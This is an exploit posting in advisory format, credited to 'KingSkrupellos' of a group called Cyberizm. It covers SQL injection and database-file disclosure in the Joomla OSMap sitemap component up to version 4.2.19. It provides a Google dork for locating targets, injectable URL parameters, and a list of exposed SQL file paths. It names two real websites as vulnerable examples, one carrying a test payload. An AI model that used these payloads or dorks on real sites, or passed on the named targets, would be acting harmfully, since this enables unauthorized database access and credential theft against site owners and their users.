- ####################################################################
- # Exploit Title : Joomla OSMap Components 4.2.19 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : joomlashack.com
- # Software Download Link : joomlashack.com/joomla-extensions/osmap/
- github.com/OSTraining/OSMap/archive/master.zip
- github.com/pabloarias/Joomla3-Base/tree/master/administrator/components/com_osmap
- # Software Information Link : extensions.joomla.org/extension/osmap/
- github.com/OSTraining/OSMap
- # Software Version : 4.2.19 and all previous versions.
- # Software Price : 39$ and 49$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_osmap''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- OSMap - the easiest way to create a Joomla sitemap.
- OSMap is a Joomla sitemap generator. It will build an SEO-friendly XML
- sitemap for Google and other search engines.
- It will also build an HTML sitemap for your visitors.
- ####################################################################
- # Impact :
- ***********
- * The OSMap component for Joomla, version 4.2.19 and other versions, is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This software is prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_osmap&view=html&id=[SQL Injection]
- /index.php?option=com_osmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_osmap&view=xml&tmpl=component&id=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_osmap/sql/install/mysql/utf8.sql
- /administrator/components/com_osmap/sql/uninstall/mysql/utf8.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.3.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.3.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.4.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.4.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.2.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.3.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.2.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.3.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.4.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.5.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.2.0.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] heinrichheinedo.de/index.php?option=com_osmap&view=html&id=1%27
- [+] staszickutno.pl/jbip/administrator/components/com_osmap/sql/install/mysql/utf8.sql
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Parameter 1 to osmap_com_k2::getTree() expected to be a
- reference, value given in /www/htdocs/v088159/2017/administrator
- /components/com_osmap/library/alledia/osmap/Helper/General.php on line 378
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################